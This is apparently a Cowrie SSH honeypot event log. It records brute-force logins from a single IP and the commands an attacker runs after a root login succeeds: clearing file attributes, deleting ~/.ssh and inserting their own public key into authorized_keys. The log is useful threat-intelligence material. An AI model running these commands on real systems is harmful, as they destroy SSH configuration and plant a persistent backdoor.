{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60198,"dst_ip":"1.2.3.4","dst_port":22,"session":"25c85b00941d","protocol":"ssh","message":"New connection: 212.227.235.229:60198 (1.2.3.4:22) [session: 25c85b00941d]","sensor":"my-vps","timestamp":"2025-08-26T23:23:54.556097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:23:54.556980Z","src_ip":"212.227.235.229","session":"25c85b00941d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T23:23:54.766198Z","src_ip":"212.227.235.229","session":"25c85b00941d"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"password","message":"login attempt [frappe/password] failed","sensor":"my-vps","timestamp":"2025-08-26T23:23:55.391797Z","src_ip":"212.227.235.229","session":"25c85b00941d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:23:56.602141Z","src_ip":"212.227.235.229","session":"25c85b00941d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48084,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ace995aea96","protocol":"ssh","message":"New connection: 212.227.235.229:48084 (1.2.3.4:22) [session: 8ace995aea96]","sensor":"my-vps","timestamp":"2025-08-26T23:24:53.293255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:24:53.995596Z","src_ip":"212.227.235.229","session":"8ace995aea96"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:24:53.996274Z","src_ip":"212.227.235.229","session":"8ace995aea96"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T23:24:56.878774Z","src_ip":"212.227.235.229","session":"8ace995aea96"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:24:59.044832Z","src_ip":"212.227.235.229","session":"8ace995aea96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39844,"dst_ip":"1.2.3.4","dst_port":22,"session":"60dda9dc2ba7","protocol":"ssh","message":"New connection: 212.227.235.229:39844 (1.2.3.4:22) [session: 60dda9dc2ba7]","sensor":"my-vps","timestamp":"2025-08-26T23:25:01.160253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:25:01.161921Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:25:01.346524Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.login.success","username":"root","password":"Yj123456","message":"login attempt [root/Yj123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:25:02.127362Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:25:02.562799Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:25:02.563865Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:25:02.564729Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:02.750573Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:25:03.141620Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:25:03.142375Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:25:03.329327Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:03.330248Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39848,"dst_ip":"1.2.3.4","dst_port":22,"session":"18392cffa6d6","protocol":"ssh","message":"New connection: 212.227.235.229:39848 (1.2.3.4:22) [session: 18392cffa6d6]","sensor":"my-vps","timestamp":"2025-08-26T23:25:03.497571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:25:03.498224Z","src_ip":"212.227.235.229","session":"18392cffa6d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:25:03.680043Z","src_ip":"212.227.235.229","session":"18392cffa6d6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T23:25:04.449483Z","src_ip":"212.227.235.229","session":"18392cffa6d6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:05.633429Z","src_ip":"212.227.235.229","session":"18392cffa6d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39860,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8b728cdbae1","protocol":"ssh","message":"New connection: 212.227.235.229:39860 (1.2.3.4:22) [session: a8b728cdbae1]","sensor":"my-vps","timestamp":"2025-08-26T23:25:05.813530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:25:05.814441Z","src_ip":"212.227.235.229","session":"a8b728cdbae1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:25:05.995438Z","src_ip":"212.227.235.229","session":"a8b728cdbae1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:25:06.763152Z","src_ip":"212.227.235.229","session":"a8b728cdbae1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:06.945714Z","src_ip":"212.227.235.229","session":"a8b728cdbae1"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:06.958351Z","src_ip":"212.227.235.229","session":"60dda9dc2ba7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34614,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c12a6ebb598","protocol":"ssh","message":"New connection: 212.227.235.229:34614 (1.2.3.4:22) [session: 7c12a6ebb598]","sensor":"my-vps","timestamp":"2025-08-26T23:25:55.597076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:25:55.598381Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:25:55.763769Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.login.success","username":"root","password":"Hp123456","message":"login attempt [root/Hp123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:25:56.467115Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:25:56.877009Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:25:56.877761Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:25:56.879227Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:57.045425Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:25:57.437983Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:25:57.439014Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:25:57.606549Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:57.607688Z","src_ip":"212.227.235.229","session":"7c12a6ebb598"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48006,"dst_ip":"1.2.3.4","dst_port":22,"session":"8619da659ca3","protocol":"ssh","message":"New connection: 212.227.235.229:48006 (1.2.3.4:22) [session: 8619da659ca3]","sensor":"my-vps","timestamp":"2025-08-26T23:25:57.771168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:25:57.772070Z","src_ip":"212.227.235.229","session":"8619da659ca3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:25:57.937223Z","src_ip":"212.227.235.229","session":"8619da659ca3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T23:25:58.638936Z","src_ip":"212.227.235.229","session":"8619da659ca3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:25:59.807310Z","src_ip":"212.227.235.229","session":"8619da659ca3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48010,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae8337b7d611","protocol":"ssh","message":"New connection: 212.227.235.229:48010 (1.2.3.4:22) [session: ae8337b7d611]","sensor":"my-vps","timestamp":"2025-08-26T23:25:59.972544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:25:59.973210Z","src_ip":"212.227.235.229","session":"ae8337b7d611"}
